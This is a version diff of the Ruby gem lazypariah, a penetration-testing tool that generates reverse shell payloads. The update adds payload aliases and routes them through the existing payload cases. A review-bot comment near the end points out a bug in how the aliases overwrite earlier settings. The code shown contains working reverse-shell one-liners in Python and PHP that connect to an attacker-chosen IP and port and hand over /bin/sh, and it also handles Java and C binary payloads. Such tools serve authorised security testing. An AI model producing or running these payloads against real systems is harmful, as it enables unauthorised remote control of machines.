lazypariah 1.0.0 → 1.1.0

Files changed (3)
  1. checksums.yaml +4 -4
  2. data/bin/lazypariah +39 -7
  3. metadata +1 -1
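--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
  ---
  SHA256:
- metadata.gz: 39fa66ebf06f26ea52ea9033989efa12ac2a517eaaecc9403c71f5cc6e2e0203
- data.tar.gz: f8de654a384319b9b3f11cb8dd5d0c0618ed17086115144c92fee6b5e20a29c5
+ metadata.gz: 1288e500075f52658c2f940333c165b9193428741782923954475ae633aaa649
+ data.tar.gz: 98f23bade85e537388413124dbccd9342df216b062b739cd883303a8ce57fcc2
  SHA512:
- metadata.gz: c8ec9e1b3e0301e242ebe549db465103c72bd47b5b8799df416846143d6d61352f427e8dcb2b030dd03c4988558275bc2127b06df501f771ff989e20909be014
- data.tar.gz: 82cd305608c676d0254d7bd9177cc2e227363fbfdbb5878628d82cc3adccef4719ad78eb06a4d6dbe5a06009fbe1431e591b57e09937d3fd9419922e90e8b5e2
+ metadata.gz: 6615b3769dff4d020ab040d0cf954b73e5c36a458777c69f8a17f6b4b726d3885b45f27a2cda8eba440afe6de2566591f69837607b3a61835676af6b54581dad
+ data.tar.gz: ea35b055a2a0e588d6d90831fca667ba82fd7abdf2c635e4027b5761e33338336f34b17ace98fc3a33b1de5c5cd14d038b66a77f12870fe21ddd5ce26ca04571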
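--- a/data/bin/lazypariah
+++ b/data/bin/lazypariah
@@ -1,7 +1,7 @@
  #!/usr/bin/env ruby
  #
  # Title: LAZYPARIAH
- # Version: 1.0.0
+ # Version: 1.1.0
  # Description:
  # LAZYPARIAH is a simple tool for generating various reverse shell payloads
  # on the fly. It is intended to be used only in authorised circumstances by
@@ -29,7 +29,7 @@ require "stringio"
 
  # Define constants.
  PROGRAM_NAME = "LAZYPARIAH".freeze()
- PROGRAM_VERSION = "1.0.0".freeze()
+ PROGRAM_VERSION = "1.1.0".freeze()
  EXECUTABLE_NAME = "lazypariah".freeze()
 
  # Define payload list.
@@ -67,6 +67,28 @@ PAYLOAD_LIST = [
  "c_binary_gzip_hex"
  ].sort()
 
+ # Define dictionary of payload aliases for backwards compatibility with versions < 1.0.0.
+ PAYLOAD_BC_DICT = {
+ "php_fd_3"=>{"payload"=>"php_fd", "fd"=>"3"},
+ "php_fd_4"=>{"payload"=>"php_fd", "fd"=>"4"},
+ "php_fd_5"=>{"payload"=>"php_fd", "fd"=>"5"},
+ "php_fd_6"=>{"payload"=>"php_fd", "fd"=>"6"},
+ "php_fd_3_c"=>{"payload"=>"php_fd_c", "fd"=>"3"},
+ "php_fd_4_c"=>{"payload"=>"php_fd_c", "fd"=>"4"},
+ "php_fd_5_c"=>{"payload"=>"php_fd_c", "fd"=>"5"},
+ "php_fd_6_c"=>{"payload"=>"php_fd_c", "fd"=>"6"},
+ "php_fd_3_tags"=>{"payload"=>"php_fd_tags", "fd"=>"3"},
+ "php_fd_4_tags"=>{"payload"=>"php_fd_tags", "fd"=>"4"},
+ "php_fd_5_tags"=>{"payload"=>"php_fd_tags", "fd"=>"5"},
+ "php_fd_6_tags"=>{"payload"=>"php_fd_tags", "fd"=>"6"},
+ "python3_c"=>{"payload"=>"python_c", "pv"=>"3"},
+ "python2_c"=>{"payload"=>"python_c", "pv"=>"2"},
+ "python3_b64"=>{"payload"=>"python_b64", "pv"=>"3"},
+ "python2_b64"=>{"payload"=>"python_b64", "pv"=>"2"},
+ "python3_hex"=>{"payload"=>"python_hex", "pv"=>"3"},
+ "python2_hex"=>{"payload"=>"python_hex", "pv"=>"2"}
+ }
+
  # Define function for displaying program information.
  def prog_info(donation_info=true)
  puts("#{PROGRAM_NAME} #{PROGRAM_VERSION}")
@@ -146,7 +168,7 @@ begin
  puts("\nToo many command line arguments were given to #{PROGRAM_NAME}.\n")
  puts(option_parser)
  exit()
- elsif not PAYLOAD_LIST.include?(ARGV[0])
+ elsif not PAYLOAD_LIST.include?(ARGV[0]) and not PAYLOAD_BC_DICT.include?(ARGV[0])
  prog_info()
  puts("\n#{PROGRAM_NAME} did not recognise the specified payload. Please consult the valid list of payloads below.\n")
  puts(option_parser)
@@ -171,7 +193,17 @@ begin
  exit()
  end
 
- case ARGV[0]
+ # Parse payload, applying aliases for backwards compatibility with versions < 1.0.0.
+ if PAYLOAD_BC_DICT.include?(ARGV[0])
+ bc_dict = PAYLOAD_BC_DICT[ARGV[0]]
+ selected_payload = bc_dict["payload"]
+ tcp_fd = bc_dict["fd"]
+ python_version = bc_dict["pv"]
+ else
+ selected_payload = ARGV[0]
+ end
+
+ case selected_payload
  when "python"
  print_output("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
  when "python_c"
@@ -196,7 +228,7 @@ begin
  if not tcp_fd
  puts("The payload you have selected requires a file descriptor to be specified. Please specify the file descriptor used by the target for TCP via the command-line argument \"-D NUMBER\" or \"--fd NUMBER\".")
  else
- case ARGV[0]
+ case selected_payload
  when "php_fd"
  print_output("$sock=fsockopen(\"#{ARGV[1]}\",#{ARGV[2]});exec(\"/bin/sh -i <&#{tcp_fd} >&#{tcp_fd} 2>&#{tcp_fd}\");", url_encode=url_encode, new_line=!arguments[:"no-new-line"])
  when "php_fd_c"
@@ -241,7 +273,7 @@ begin
 
  File.open(temp_dir+"/rs.class", "r") do |f|
  java_payload = f.read()
- case ARGV[0]
+ case selected_payload
  when "java_class_binary"
  print_output(java_payload, new_line=false)
  when "java_class_b64"
@@ -270,7 +302,7 @@ begin
 
  File.open(temp_dir+"/rs", "r") do |f|
  binary_payload = f.read()
- case ARGV[0]
+ case selected_payload
  when "c_binary"
  print_output(binary_payload, new_line=false)
  when "c_binary_b64"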
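Review bot: The alias branch at new lines 197–201 assigns `tcp_fd` and `python_version` unconditionally, so an alias that lacks one of the keys sets that variable to nil; `python3_c` has no `"fd"` entry and `php_fd_3` has no `"pv"` entry, and whatever option parsing stored there earlier is discarded. Option parsing is outside the hunks shown, so whether this changes output today is not visible, but assigning only the keys that exist is safer: `tcp_fd = bc_dict["fd"] if bc_dict.key?("fd")` and `python_version = bc_dict["pv"] if bc_dict.key?("pv")`. `PAYLOAD_BC_DICT` is also left mutable, unlike `PROGRAM_NAME` and `PROGRAM_VERSION`, so closing it with `}.freeze()` would keep the alias table from being altered at runtime. The `begin` block that holds this code starts and ends outside the hunks.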
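--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
  --- !ruby/object:Gem::Specification
  name: lazypariah
  version: !ruby/object:Gem::Version
- version: 1.0.0
+ version: 1.1.0
  platform: ruby
  authors:
  - Peter Funnell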